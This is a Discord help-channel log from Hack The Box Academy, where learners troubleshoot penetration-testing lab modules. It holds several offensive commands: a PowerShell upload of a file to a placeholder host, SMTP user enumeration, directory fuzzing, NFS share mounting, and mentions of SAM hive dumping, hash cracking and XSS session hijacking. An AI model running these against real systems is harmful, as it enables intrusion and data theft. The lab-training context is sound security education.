#modules

1 messages · Page 253 of 1

haughty tree
#

Has anybody had success with these commands using a WebDAV server? I spent so much time trying to figure out why they did not work for me just to ditch them for the following powershell command:

Invoke-RestMethod -Uri "http://{ip_addr}/{file_name_output}" -Method PUT -InFile {file_path}
abstract phoenix
#

hi. i think there's an issue with one of the modules. the shell and payloads one. the skill assessment seems to have at least two issues: 1) most of the time you can't spawn the target. you click and wait half an hour and still not target. 2) if you're lucky after several tries, host2 and host3 don't seem to work properly. each time you try to access blog.inlanefreight.local or upload a file on host3 you get a connection reset or timeout

abstract phoenix
#

so it seems there's something wrong with the hosts

abstract phoenix
#

lemme check

#

nah

#

US Academy 3

haughty tree
#

Might be stupid but maybe try running ftp.app? for some reason it shows on your machine as ftp.app instead of ftp there

open summit
#

/usr/lib/apt/methods/ftp

#

i found the file path of it

#

its definetly there but the terminal just cant find it

haughty tree
#

thats weird

#

it should be in /usr/bin if its a binary

#

If you run sudo apt install ftp does it tell you that its already installed?

abstract phoenix
abstract phoenix
open summit
#

i did it just doesnt work

#

/usr/lib/apt/methods/ftp -p 10.129.158.192
100 Capabilities
Send-URI-Encoded: true
Send-Config: true
Version: 1.0

#

it just pastes thisinstead of actually connnecting

#

i just use the path instead of ftp since it cant find it but the ftp itself as well doesnt work

#

im gonna start tweakin

#

i know why

#

im not connected to a vpn i just realised

abstract phoenix
open summit
#

do i use udp or tcp

#

ftp -p 10.129.210.92
100 Capabilities
Send-URI-Encoded: true
Send-Config: true
Version: 1.0

#

just gives me this when i use ftp command

abstract phoenix
#

target spawned quickly. then pwned host2 in two minutes. so the last 5/6 hours spent were a network issue lol

#

the targets are still massively slow. but at least the exploits work and i can upload files

#

and finish the module zzz

#

good to know for the future

fiery berry
open summit
#

/usr/lib/apt/methods/ftp -p 10.129.210.92
100 Capabilities
Send-URI-Encoded: true
Send-Config: true
Version: 1.0

#

just doesnt work jsut gives me this response all the time

#

also i installed vsftpd

#

how do i enable the service and check its enabled

fiery berry
open summit
#

ye same response

fiery berry
# open summit ye same response

strange, for me it works. Plus you need to get used to linux, better to start from the linux fundamentals module or you read the man pages.
EDIT: There is always google by the way in case you need it

open summit
#

i tried everything

#

cant find the aolution to get it working

autumn pilot
#

If you have tried everything and it still doesn't work, try taking a break

abstract phoenix
open summit
#

ive tried everything

#

idk why it doesnt wanna ftp connect

autumn pilot
#

Try with the workstation provided in academy instead

open summit
#

ye that will prob work

#

but i wanna get it fixed on this crappy system

haughty tree
#

How did you install the OS and how did you install ftp?

rustic sage
#

Trying to use the PUT method to change the data from london to flag, what did I do wrong? |||||||||||||| curl -X PUT http://83.136.251.211:55760/api.php/city/london -d '{"city_name":"flag", "country_name":"osaekhada"}' -H 'Content-Type: application/json'

haughty tree
#

It was directed to the guy who has problems with ftp, I'm curios if he installed it via live cd or a preinstalled vm

soft plume
#

Hi, I'm currently on "Attacking Email Service" in the "Attacking Common Services" and the command: ||smtp-user-enum -M VRFY -U users.list -D inlanefreight.htb -t 10.129.203.12 || doesn't seem to be finding anything. It's attempts to finds any users, however comes back with zero. I deleted and redownloaded both users.list and smtp-user-enum. Restarted VM, tried new IP and nothing. Does anyone have any idea? I can send screenshots if needed, all it says is 0 results. I have tried to find the actual user in the user list to which they ARE in it, but I just want to actually do the lab.

fiery berry
fiery berry
soft plume
#

kk

gray merlin
soft plume
gray merlin
soft plume
#

all good

soft plume
fathom pendant
#

Also wait time

#

Smtp is a slow service

rustic sage
open summit
#

just got the htb student monthly

fathom pendant
#

Hello edgy dark humor skid

#

Read and follow #welcome and do active content on the main site

daring totem
#

can anyone lend a helpful tip on this module, find through SPL searches against all data the password utilized during the PsExec activity. I feel that the first command in the module leads closer to finding the answer. although I feel like I'm missing one or two more steps to finding it

#

I feel that the other commands in the module are over complicating it

dire abyss
#

nvm

#

it doesnt like that i specified the port instead replaced that with the word "port"

fathom pendant
#

yep

#

that's exactly it

#

since it's a docker instance, the port isn't gonna be consistent

dire abyss
#

lol i was so confused

#

btw congrats on the community helper thing, well deserved

earnest imp
#

hello everyone

#

I'm doing the Windows Event Logs module. However, the RDP connection is not stable.

high reef
#

anyone can help me with this ?

#

i followed everything to the Tee but i can't get SedownloadPrivileges to work and be turned on

#

even the automation script doesnt work

high reef
rapid heron
#

I am trying to setup ligolo and it says the interface is down?

Here are the commands I ran:

sudo ip link set ligolo up
ligolo-proxy -selfcert```
#
9: ligolo: <NO-CARRIER,POINTOPOINT,MULTICAST,NOARP,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen 500
    link/none 
#

Is there any other commands I am supposed to run?

thorn basin
#

In password attacks, PtT Linux, i am stuck when escalating to julio

#

can someone nudge me?

earnest imp
dim wolf
#

run ligolo and it should work

rustic sage
#

in another module i couldnt access ssh but i could with pwnbox

earnest imp
#

yes it is terrible

#

I have a problem with RPD connection

rustic sage
#

hopefully they fix this soon

earnest imp
#

but when I did some exercices with elasticsearch it was not stable too

#

ho ok so the problem is known

#

it si very frustrating

rustic sage
#

i dont know if its known

dim wolf
#

<@&861185840277487616>

rustic sage
#

dude omg

#

take this fellow down

woven stone
#

[MaOS foundamentals] - Where are the Applications related to the system stored at?

#

i tried /Applications, Applications

#

and /app /app/data

cloud urchin
#

it's looking for system apps, not normal user apps

rustic sage
#

should be /Applications path since system installed .app files live there

olive slate
#

Is it just me or is the target hosts in academy super unstable currently

#

They seems to stop responding intermittently

woven stone
# woven stone

I don't have a Mac so I'm having trouble answering the question

woven stone
cloud urchin
#

i wonder if that actually works lol. it might be a bit old.

next bronze
#

that's pretty cool

#

you can just build a macos vm tho Kappa

cloud urchin
#

it wouldn't be real red teaming without a little torture

rustic sage
#

@woven stone Try /System/Applications

pine dune
#

hi guys, how can I find out which domain and smb server belongs to?

next bronze
#

include the module and section when you ask here pls

#

and again one of the tools in the section will do it

pine dune
#

oh sorry let me do that

#

module is "footprinting" and the section is "smb"

#

is it smbstatus?

rustic sage
#

Have you scanned the target?

pine dune
#

yea

rustic sage
#

How have you enumerated the target?

#

I am working on the session hijacking section of the XSS module. I am trying to set up my listener on a seperate laptop. I have the htb vpn running on it. I used the command "ip a" to get my machines ip for the script, but eth0 shows that it is down. the ip addresses at lo and wlan0 did not work.

#

any tips on how to troubleshoot this?

pine dune
cloud urchin
rustic sage
#

@pine dune** How have**

pine dune
rustic sage
pine dune
#

connected to the IP using smb

#

look at this

cloud urchin
#

try re-downloading the vpn file from academy and reconnecting openvpn vpnfile.vpn & then you can close the window when it connects

pine dune
#

@rustic sage

next bronze
#

I mean there are tools taugh in the section, use them

#

smbclient is not the only tool

woven stone
rustic sage
#

@pine dune Go back over the module and look at the enumeration examples i.e. commands

pine dune
#

okay thanks @next bronze and @rustic sage

woven stone
rustic sage
#

Did /System/Applications work

pine dune
#

is the answer not in here? I am sure its in this image

next bronze
#

does any of those say domain?

rustic sage
#

I think you should review the module and look at the commands

next bronze
#

look at the commands in the section lol

rustic sage
#

Your answer is in the commands within the section

pine dune
#

ahh my bad I thought it was asking server not domain 😅

rustic sage
#

The issue is, you're not testing and enumerating enough

pine dune
#

okay ill try

#

can someone give me a clue?

woven stone
rustic sage
#

We have twice

woven stone
#

and i fou this

rustic sage
#

It's in the module notes Alpha, re-read it carefully

pine dune
#

okay thanks

rustic sage
#

Is kail or parrot os better

woven stone
cloud urchin
#

whatever your preference is (kali is better)

woven stone
cloud urchin
#

the truth is they're both debian based and you can install whatever tool the other one doesnt' have pretty easily, it's literally preference

woven stone
rustic sage
#

Out of the box I prefer kali

#

but it's subjective

pine dune
#

thanks @rustic sage and @next bronze found it 😄

cloud urchin
#

<@&861185840277487616>

dim wolf
#

neither is necessarily better but kali comes with zsh installed

#

speaking of which, installing Parrot OS 6 HTB Edition has an issue with bash; every time you open it, it spits out garbage characters

next bronze
#

real hackers use sh Kappa

woven stone
dim wolf
#

what

woven stone
rustic sage
#

Have you enumerated the shares you have access to with commands from the section?

rustic sage
#

i was able to figure out the vpn issue, but i still cant get a response on my listener. I am going to set it aside for now and try again later

#

@pine dune Look at the commands outlined in the section for rpcclient

#

There is a table that shows you one in particular you need here

pine dune
spark spruce
#

hey guys
Still I am getting this error so many times

cloud urchin
#

re-download the vpn (choose TCP), reconnect to the vpn with the new file, restart the victim machine, wait 5 mins, then try again

cloud urchin
#

and maybe switch VPN regions, i'm always hearing about how EU vpn has issues if you're on that

spark spruce
#

guys pls help here
from yesterday I am unable to move this file

cloud urchin
#

maybe try copy instead, there are also a ton of other ways to xfer files

cloud urchin
#

the command is 'copy'

spark spruce
spark spruce
fathom pendant
dim wolf
#

just a bit annoying to figure out for the first time

woven stone
#

I tried all possible methods but it didn't work

fathom pendant
#

Perhaps you're not going back far enough

#

Are you asking me or telling me that's what you tried

woven stone
#

worked

fathom pendant
#

Delete as spoiler then

#

:)

woven stone
fathom pendant
#

. this too

quasi wave
#

has anyone else here done the vulnerability assessment module? I'm most of the way through it right now and I've been working on it for 11 days. I'm at the first nessus assessment and I will probably finish on Saturday because tomorrow and today I am booked.

#

I ought to reread the nessus stuff tho

fathom pendant
#

everything you need is on the provided host [target] at https://ip:nessus_port/

#

and the creds are given to you to log into it

quasi wave
#

ok ya

#

ok thanks

fathom pendant
#

unless you have a pivot, you're not scanning the internal network

quasi wave
#

just gotta find time to finish it

#

ok cool got it thanks. good to know

#

is OpenVAS assessment similar?

#

is it normal to take two weeks to complete something like this?

#

with 17 sections?

fathom pendant
#

they both have pre-compiled scans that will have all the information required to answer the questions

quasi wave
#

I did the math and the average module has 17 sections

#

so, if I complete 17 sections every two weeks I will complete the CPTS path in 11 months

#

is that normal?

fathom pendant
#

there's no "normal"

#

if that's a pace you're comfortable with. then it's fine

#

if not then re-evaluate

quasi wave
#

ok got it thanks

fathom pendant
#

it's as simple as that ¯_(ツ)_/¯

quasi wave
#

ya

#

ok thank you.

tame stirrup
#

Learning is a skill in of itself, some are better at it than others as it's more practised

#

Rushing decreases retention rates, too slow wastes time

#

Just make sure to revisit things from time to time and you'll be fine

fathom pendant
tame stirrup
#

Yes

fathom pendant
#

some people may only have time to set aside N hours of progress every day/week

#

it's just coming to terms with understanding that it will take longer overall

dim wolf
silk dagger
#

nobody here that did the SAML part on academy?

woven stone
#

Why do we use the word FUZZ after the end of files? Is it useful?

cloud urchin
#

in what context

woven stone
#

ffuf -u http://94.237.54.214:33139/FUZZ.php -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ

#

list:FUZZ <-

cloud urchin
#

according to the documentation that shouldn't be required. i'm not sure why it's added.

next bronze
#

so that it's easier to set up multiple fuzzers: FUZZ FUZZ1 etc

woven stone
fathom pendant
#

it's to show that technically you can replace :FUZZ with anything like :SCAN

woven stone
fathom pendant
#

(and replacing the FUZZ in the url with SCAN will perform the same task)

#

with multiple wordlists, it makes it easier to parse through

woven stone
spark spruce
#

In this
sam.save and security.save file moved and copied successfully but
system.save file getting network error again and again
Its because system.save file is much larger than other in size

So anyone knows how to transfer big files
any alternative method???

cloud urchin
#

smb share, drive share via rdp

#

cme

fathom pendant
#

that is smb share ya goon

spark spruce
cloud urchin
#

naw that's a pic of the module

fathom pendant
#

but ik what you mean, sharing the folder you save these to

cloud urchin
next bronze
#

smb is usually pretty stable, are you using tcp vpn

spark spruce
next bronze
#

or is your smbserver cooked

cloud urchin
spark spruce
#

yes

spark spruce
cloud urchin
#

then when you open Explorer you'll see the drive connected under 'my computer'

#

probably the easiest way to xfer files

spark spruce
#

Is there anything I am mistaken

cloud urchin
#

i'd probably reboot the victim host at this point, maybe your vm box/computer too and try again

next bronze
#

your internet might be poopoo

#

use pwnbox?

cloud urchin
#

^

spark spruce
#

Internet is very good

cloud urchin
#

are you on wlan?

spark spruce
#

When I delete any file
It takes 0.4 to 1 seconds
But when I start copying it takes so long

spark spruce
cloud urchin
#

wired will be more stable

fathom pendant
#

i've done a handful of content on WLAN just fine ¯_(ツ)_/¯

cloud urchin
#

yeah it shouldn't but at this point it's either he needs to reboot the box/his stuff, or there is some kind of network problem going on

#

just curious if he considers "very good" internet over wifi

cloud urchin
#

because i don't

spark spruce
fathom pendant
#

¯_(ツ)_/¯

#

i mean definitions can vary yeah

#

the other telltale sign is if you ping the box and get random spikes out of the norm

#

i.e. norm being 200 and you're getting like 16k ping spikes

cloud urchin
fathom pendant
#

also download a new vpn, change regions to generate a new one

spark spruce
#

Sure
I am going on pwnbox

cloud urchin
#

make sure to disconnect from the vpn if using the pwnbox

fathom pendant
#

^

sick swift
#

Hello 👋

spark spruce
#

It's about 1 hour 25 minutes

cloud urchin
#

what vpn region are you in?

#

i always hear bad things about eu region

fathom pendant
#

(yes vpn region still affects even with pwnbox)

spark spruce
#

EU academy 1

cloud urchin
#

maybe consider swapping to US or somewhere else for testing

fathom pendant
cloud urchin
#

really shouldn't be that slow

spark spruce
#

Is this the fastest way to transfer file?

fathom pendant
#

Smb is just the simplest

cloud urchin
#

for the purposes of the lab i would say transfer methods are negligible in terms of speed

fathom pendant
#

^

#

Also most cases a 40MB file will be negligible regardless of method

spark spruce
#

Which pwnbox location would be better?

cloud urchin
#

i would try US

spark spruce
#

Ok

cloud urchin
#

if another region and/or the pwnbox doesn't work, you should probably open a ticket with support via the website

spark spruce
#

successfully transferred through pwnbox
But I wanna know why my VM was too slow

cloud urchin
#

did you change regions on top of using pwnbox

fathom pendant
#

^

spark spruce
#

yes

cloud urchin
#

it could be either the region or your box then

fathom pendant
#

Vpn connection was the problem

cloud urchin
#

yeah probably

spark spruce
#

but still pwnbox is faster then my VM

#

any tip you prefer to make my VM fast

fathom pendant
#

More dedicated ram

cloud urchin
#

i've seen virtual machines fail, kinda rare, but it's happened to me where stuff was just a little off and not working. a reboot of my main computer fixed it. you could always try rebooting and trying again if you really want to figure it out

next bronze
#

it's a networking problem if file transfers are slow

fathom pendant
#

But in seriousness it depends

spark spruce
fathom pendant
spark spruce
fathom pendant
#

?

cloud urchin
#

well that's a problem

spark spruce
fathom pendant
#

Ok that makes more sense

cloud urchin
#

it's probably more something is going on with winsock or the vm's network stack

fathom pendant
#

Also sometimes having too many cores allocated can cause issues

#

Parrot doesn't like more than like 4 I think

#

I run my parrot vm with 4GB ram and 2 cores

spark spruce
fathom pendant
#

Though with my frankentop I'm surprised it just works

next bronze
#

2c/4gb or 4c/8gb willl be enough

cloud urchin
#

it's very likely not a resource issue with the vm

fathom pendant
#

Yeah doesn't look to be the case

cloud urchin
# spark spruce

No one's really going to be able to directly pinpoint exactly what caused this, but again, reboot your entire box and try again and you may find it just works again. also keep in mind, you changed VPN regions, so it could still simply be that the region was the issue.

spark spruce
#

I have faced so many problems
but pwnbox has solved it because of its better performance

cloud urchin
#

nothing wrong with using the pwnbox

fathom pendant
#

Yep

fathom pendant
#

Ive reinstalled vms before and then they just work™️

#

Changing no settings

spark spruce
cloud urchin
#

reboot your pc, connect to us vpn, see if it works then

#

that's my advice if you want to continue troubleshooting

spark spruce
#

yeah
pwn would be better to use

#

And VPN changing matter

cloud urchin
#

yes it does

cloud urchin
cedar yew
#

Does anyone have problems starting the machines?

viral slate
#

[NTLM RELAY ATTACKS - SKILLS ASSESSMENT]
Hey guys!
Currently working on skill assessment here and got stuck on second question.
Can I have a nudge?

muted kindle
#

I like the siem fundamentals course I finally understood how each component of ELK stack works as my only exposure was to splunk which already has everything integrated

rain portal
#

Hi all, i'm working through "Introduction to Windows Evasion Techniques: Dynamic Analysis" and i'm using Micr0_Shell to generate the shell code but it's not giving me a shell back. I moved on to the Process Injection, and Notepad opens but again i don't get a shell back. I'm literally following everything step by step. Can someone check i'm not going insane and check if they get a shell back using Micr0_Shell
UPDATE: I tried again following the same steps the day after and it works

cedar void
regal sigil
#

hey i need quick help, how do i remove this notification bar on top of my screen

#

Exams VPN Scheduled Maintenance us-academy-exams-1 this one

fathom pendant
regal sigil
fathom pendant
#

yeah i use my own vm so i don't worry about that

hexed lintel
#

can anyone explain / give hint on this question

#

Foorprinting module SMB section

#

I have tried using rpcclient netsharegetinfo, but didnt get the solution

fathom pendant
#

Banners

#

Hint: customized means not a default name like smbd or smbshare

#

But perhaps tied to a company name

hexed lintel
fathom pendant
hexed lintel
odd otter
#

Hi, i'm stuck on https://academy.hackthebox.om/module/80/section/848
Broken Authentication:Skill Assessment - Broken Authentication
After some detect length of password i fond 2 passwords:
**
**

And use ||http://.../messages.php -X POST --data user=FUZZ&message=random&submit=submit||
found valid users:
||guest
support.it
support.uk
support.cn
support.gr
admin.cn
admin.us
admin.gr
admin.it||
obtained valid credential ||support.uk:*||
Nothing found in here
Understand logic of cookie:
but this didn't help too

fiery berry
storm elk
odd otter
storm elk
#

Feel free to dm me if you need a nudge. Tell me what you know and I’ll see what I can do 🙂

rustic sage
#

||showmount -e 10.129.202.41 Export list for 10.129.202.41: /TechSupport (everyone)||

#

||sudo mount -t nfs -o rw,nolock 10.129.202.41:/TechSupport"/mnt/techsupport||

#

||ls -la /mnt/techsupport ls: cannot open directory '/mnt/techsupport': Permission denied||

#

I tried my best with searching up this problem, idk why it won't let me read or access the share

odd otter
#

I somethink found new for my self. So may i will try more.

fathom pendant
#

you need to use an option that doesn't lock it

#

or; just run around it as root

#

i think it's like norootsquash

rustic sage
fathom pendant
#

it's one of those odd things

#

it's an additional option

rustic sage
#

oh nvm

fathom pendant
#

¯_(ツ)_/¯

#

i forget the way around it

#

most people just navigate with root/sudo

rustic sage
fathom pendant
rustic sage
#

alright, will update

hasty sparrow
#

Hello I’m doing Linux fundamentals in htb academy and I’m ssh in to a mec Iv got all but 2 flags I need the What is the path to the htb-student’s Mail?
Which shell is specified for the htb-student user. Can anyone help talk me though it please give me a idea where to look I’m a complete noob the rest Iv found my self just them 2 are hard to come by

fathom pendant
#

then you can search that list for MAIL and SHELL

#

note the MAIL directory may not actually exist on the filesystem

fallen zephyr
#

hi guys, can someone help me ?

which is the right channel to ask about a hint for a machine?

fathom pendant
hasty sparrow
fallen zephyr
fathom pendant
raven stag
#

What version of the SMB server is running on the target system? Submit the entire banner as the answer.

Is there an error in this question?

raven stag
#

i solved it thank you

rustic sage
# fathom pendant just su to root or use sudo to grep/find

shiii, so I tried running grep on it, is there a way to make it just list out EVERYTHING in the mount? I did get some output but I am sure there is some way to just get an output of the contents of all the files in the mount share

fallen zephyr
#

Guys i'm stuck on HTB corporate machine, i have owned the workstation (10.9.0.4) but i'm stuck, i no see anyway to jump to other machines...

fathom pendant
fallen zephyr
#

some tips please?

fathom pendant
#

#boxes again, you need to link your account following the instructions in #welcome

fallen zephyr
#

thx done

fathom pendant
#

GL :)

marsh fulcrum
#

Module: Attacking Enterprise Networks Section: Exploitation & Privilege Escalation

For anyone needing this, changing the VPN server was the fix for me!

slender wolf
#

Phishing section of XSS module:
The URL I made works fine when I test it on my end but when I go to the send.php page it's unable to send the URL. Anyone run into similar issues or may have an idea of what I may be overlooking ?

fathom pendant
marsh fulcrum
fathom pendant
#

because most people are discouraged from asking for help on that module, as the module itself is the walkthrough

#

so if you're struggling, with the steps in front of you, it's generally not a good sign

marsh fulcrum
#

Yes I can understand why, my problem was a weird one, me and the support were trying to look at the problem but a simple change of the vpn server was the fix

fathom pendant
#

tends to be the simplest solutions to problems

#

:) and usually the first suggestion to try if you're sure you're doing it right

stark egret
#

Hey, @west rampart does the Plan Feature - Monthly billing for Students, unlock the completed modules permanently once they are solved?

fathom pendant
#

you keep all modules you 100% complete

#

also don't random @ staff lol

#

this question has been asked and answered dozens of times in here, #cwes #cpts #cdsa

vernal egret
#

how can i have access to chat in global ?

stark egret
#

Thanks

fathom pendant
hardy pewter
#

Hi, not sure if this is the right forum to ask this but does anyone know if there are any channels for the Blacksky cloud labs? Thanks in advance.

fathom pendant
wooden trail
#

Any hints on Attacking common services - Easy? Already done tons of enumeration, read documentation of XA* running on the server, tried what stated on FAQs, bruteforced ftp, smtp, rdp..., tried also with user f* I got enumerating... I think I may be getting crazy, suposed to be Easy hahahahahah

#

also, no anonymous accesses are allowed

fathom pendant
#

You're likely just overthinking it

wooden trail
#

probably

fathom pendant
#

There's a running service and placing files is easy

wooden trail
#

you mean on the service?

fathom pendant
#

On a service

#

Which can further be used to just gain rce

wooden trail
#

i understand what you mean, but I have anonymous access to none, am I trippin?

cedar void
#

I am trying to start the fuzzer for the Zap Fuzzer but don't know how to set the payload

" The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists. "

https://academy.hackthebox.com/module/110/section/1056

pine dune
#

Hey, Im doing footprinting module and stuck on a question in the smb part

#

"Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer. "

#

I know the share is called "sambashare" in the smb server but how do I go about answering this question?

fathom pendant
#

If not then you haven't dug hard enough

wooden trail
#

I assumed I was missing something

fathom pendant
#

Bruteforce creds can work

#

Use common password lists

wooden trail
#

the module itself provides both users and passwords, so will try that again

fathom pendant
#

You found a user

#

f* is on the right track

wooden trail
#

thx

wooden trail
daring totem
#

find through an analytics-driven SPL search against all data the source process images that are creating an unusually high number of threads in other processes. Enter the outlier process name as your answer where the number of injected threads is greater than two standard deviations above the average. Answer format: _.exe (any tips anyone can give out?

wooden trail
wooden trail
open summit
#

im running a search exploit on an ip using msfconsole

#

but it just comes up with like 2000 exploits how am i meant to find a plugin one like im so confused

#

y

fathom pendant
#

sometimes they're Simple

pine dune
fathom pendant
wanton idol
#

im pretty sure u can find out via rpcclient command

fathom pendant
#

Made up is also pretty loose

pine dune
fathom pendant
#

if you customize a version, i.e. write in certain lines of code and deviate from the source code for updates

#

it is no longer the base version

pine dune
fathom pendant
#

A lot of browsers are based off of chromium now

#

does that mean that Firefox is just a made up version of Chromium?

#

or Edge?

pine dune
fathom pendant
#

i mean one of the enumerations in rpcclient says it to you

#

perhaps look for it's relation to a company

wanton idol
#

yeah man look at the rpcclient commands

pine dune
fathom pendant
#

companysmb numbers

#

iirc is the format

#

you likely looked at it and disregarded it

wanton idol
#

when u go in rpcclient u can type help to view available commands

#

see which command could enum for smb

fathom pendant
#

no need to view the whole gamut of commands

wanton idol
#

LOL well the more you know

fathom pendant
#

the easier modules tend to not just dump a tool on you and not at least give you some basic commands

pine dune
#

Okay thanks guys ill try enumeration on rpc when i get back home tonight

wanton idol
#

👌

fathom pendant
#

it's also in the banner when you connect to the smb server

wanton idol
#

oh i didnt know well that way is easier ig

fathom pendant
#

simple and easy to overlook

#

most services tell you what version they are when you connect to them ¯_(ツ)_/¯

wanton idol
#

yeah i just go straight into looking rather then seeing the banner when u connect lol

daring totem
#

could anyone lend some guidance towards this question "find through an analytics-driven SPL search against all data the source process images that are creating an unusually high number of threads in other processes. Enter the outlier process name as your answer where the number of injected threads is greater than two standard deviations above the average."

wooden trail
#

on attacking common services medium is the machine going crazy or am I not supposed to log in through ssh? found valid credentials for user s* bruteforcing ssh itself xD, but cannot connect through console

wooden trail
rustic sage
#

tips on enumarating pop3 and imap services without any prior credentials?

rustic sage
shut quest
rustic sage
#

AYO PAUSE

#

apologies

rustic sage
shut quest
#

Not the server for piracy. Also this channel is only for HTB Academy

rustic sage
#

hint being the "backup server"

fathom pendant
hexed oyster
#

Hi all, I'm working through "SQL Injection Fundamentals" and I'm noticing that the scenario described in the text isn't lining up with what I'm seeing when I connect to the server spawned at the end. Is that normal?

wanton idol
hexed oyster
rustic sage
#

Can anyone else confirm that sysmon.exe is broken on the "Analyzing Evil With Sysmon & Event Logs" section of the "WINDOWS EVENT LOGS & FINDING EVIL" mini module? (https://academy.hackthebox.com/module/216/section/2301)

Spawning the Windows target host, RDP'ing and then running sysmon.exe results in failure.

This is done having CMD being run as an administrator. No modifications were done to the XML file that comes with the VM.

wanton idol
hexed oyster
#

so entries from the ports table and the ships table were combined into a single output with four rows. As we can see, some of the rows belong to the ports table while others belong to the ships table.

#

😔 sorry, been a difficult week.

#

I don't see a database or tables that match up with what's being described here. Is that normal?

#

Like, the author is describing this from a 'hypothetical' example?

wanton idol
#

well what have u tried on the target to re-creat that sqli?

hexed oyster
#

I'm just learning the union clause, I have a server to connect to and try it out

wanton idol
#

everything is an example

hexed oyster
#

is it a practical example?

wanton idol
#

yup

hexed oyster
#

should those tables be visible in the database that I connect to?

wanton idol
#

i dont think those specific tables, if u connected to a mssql or doing it via a sqli exploit it wont have the same database and tabes etc etc, its the method of how to use un-even columns with union clause

hexed oyster
#

Got it. so it's more of a high level explanation. 👍 👍 Perfect! thank you!

wanton idol
#

yeah its just the method you have to understand

hexed oyster
#

'method' was the word I was looking for. Thank you.

sick swift
#

Thanks

fathom pendant
#

@jolly cradle apparently @ everyone perms might be busted

rustic sage
#

then why it said i can ping it

#

it got deleted automically i asked for help network

jolly cradle
#

It doesnt actually ping it

fathom pendant
#

Weird, I was receiving pings

rustic sage
#

maybe its just a glith lets move on

fathom pendant
#

So Ig they were doing the ghost ping thing

#

Pain in the ass

rustic sage
#

anyways can i get neetwork to install viruses to understand the viruses and get rid of it challeng

fathom pendant
#

Specifically

rustic sage
fathom pendant
#

The answer will be no

rustic sage
#

is network expensive

fathom pendant
fathom pendant
#

This channel is for discussion and help with the htb academy modules

rustic sage
proper scarab
#

I am having a problem cracking the password for the linux pass the hash for the linux01$ account I have root and the password hashes but after tring several dictionaries I can not get the password, can someone tell me if I am going in the right direction or help nudge me to where I need to be looking?

fringe urchin
rustic sage
fringe urchin
haughty tree
#

Hey, so in this example they talk about how sometimes powershell is blocked, and the alternative may be to use a LOLBIN like for example the Intel Graphics Driver but they use it in the example... from PowerShell, so what do you actually do if powershell is blocked

earnest imp
#

Hello I have a question about the module Windows Event Logs

fathom pendant
earnest imp
#

I did the exercies but I have a question with the second

haughty tree
# fringe urchin Cmd?

That's probably possible, although what would you do in case CMD is also not whitelisted

earnest imp
#

I was not able to filter correctly the log to isolates the good event

#

I tired to use this following XML but it seems the query is ignored

earnest imp
wanton idol
fathom pendant
# earnest imp

well you do have to change some modifications to the query info

#

like ID and such

fringe urchin
#

I cant get inti my htb account lol

earnest imp
#

It is my full XML so I'm already filtering the good event ID (its works).

fathom pendant
fathom pendant
#

at least for the one section that has you start at logon events

#

also only one of those will show the right info

#

as 4907 is only one type of logged event

#

sorry LogonID*

earnest imp
#

could give me an example?

fathom pendant
#

there's an example from the module, no?

earnest imp
#

yes but it is not complete

#

*[EventData[Data[@Name='SubjectLogonId']='0x3E7']]

fringe urchin
fathom pendant
#

it's partial, yes

#

but that should be enough to build off of

#

SubjectLogonID is part of the Name Data field of the XML field of the event

#

looks like the ProcessName field would be what you use

#

or maybe ObjectName

#

since it gives you a path?

cedar yew
#

hello gyus Are your VPN files working? Even though I tell the VPN files one by one, they are not connecting.

earnest imp
#

yes

earnest imp
earnest imp
fathom pendant
#

<Data Name='<name>'>(Actual Info)</Data>

#

for instance in the example the 0x3E7 is represented by <Data Name='SubjectLogonID'>0x3E7</Data>

#

you should be able to work backwards from there

inner geyser
#

Anyone else having issues connecting to targets? Specifically RDP sessions? Tried on PwnBox as well as my own. Tried renewing VPN connections and respawning target hosts...screen just sits on black til it eventually times out

fathom pendant
#

Blackscreen +infinity | braincells 0

inner geyser
#

lol well i just needed your response Marcie....didn't even have to hit enter this last time i reloaded it

#

will do that next time though

fathom pendant
#

yeah

#

can you tell you're not the first (nor likely the last)?

inner geyser
#

hahaha.....been trying to search the discord chat on questions prior to posting them but failed on that this time too

fathom pendant
#

in:modules blank screen or in:modules black screen

inner geyser
#

yeah i just mean i failed to search before asking the question lol

fathom pendant
#

np

#

the one thing i dislike about discord search is that it's not overall keyword search

#

it's verbatim search

#

so it'll look for "blank screen" but not "screen blank"

inner geyser
#

yeah not the best, could be worse....I've generally found enough past content not to bug you too much!

fathom pendant
#

this channel is meant for asking questions ¯_(ツ)_/¯

#

sometimes all I do is a quick google query to answer stuff

#

i.e. finding the microsoft article about event ID 4907 and quickly scanning it to understand what data it's pulling for finding info

radiant hull
#

is it possible to decrypt a file without knowing the key?

fathom pendant
#

You mean access a password protected file? Or you mean after a ransomware attack

#

Either way, not for this channel

#

Read and follow #welcome to access more of the server

radiant hull
#

ok which channel?

fathom pendant
#

Well if you read and follow #welcome you can probably figure out for yourself which channel would be better for your question

radiant hull
fathom pendant
#

Man if only they told you exactly where in the instructions

#

Specifically in step 1

radiant hull
#

ok i didnt read the steps thanks bro😂

dull thunder
#

anyone else having issues reaching the web-pages on port 80 for the "documenting and reporting" labs ?

#

i can ping them and nmap shows them but a web browser or curl times out

limber river
gray merlin
sterile epoch
#

hi I am having trouble selecting a msfvenom payload is there a site like revshells that will do this hard work for me or a site with a guide for it?

high reef
#

anyone do this room

#

i can't connect no matter what i do

#

refresh VPN start a new connection nothing works

wanton idol
pine dune
#

I am also having vpn problems :/

#

acting really slow

rustic sage
wanton idol
rustic sage
#

im asking because rightnow all the linux rdp tools are being weird

#

they kick me out or they say invalid password when that password just worked

sterile epoch
#

I am a part of domain admins but I cannot view reg key

#

I tried to use elevated powershell but there was no promt and no difference in whoami. I am currently netadm which is part of Domain Admins

wanton idol
sterile epoch
#

yea I tried closing the rdp session and logging back in

wanton idol
#

have u tried to query in cmd?

sterile epoch
#

yes

wanton idol
#

which module u doing i assume the windows priv esc dns admin

sterile epoch
#

yep

#

I tried going into admins folder to view the flag but I got the same permission denied

wanton idol
#

maybe uac is on, try to see if u can open a cmd not in powershell and right click on cmd and see if u can run as administrator

sterile epoch
wanton idol
#

wait wait lol is the ip the same ip for your machine inside of your query? i just noticed that.

sterile epoch
#

you mean the target ip?

wanton idol
#

yup

sterile epoch
#

we need to provide the foothold ip right?

wanton idol
#

yup just wanted to see if u did that correct but u did. idk why its giving u access denied

sterile epoch
#

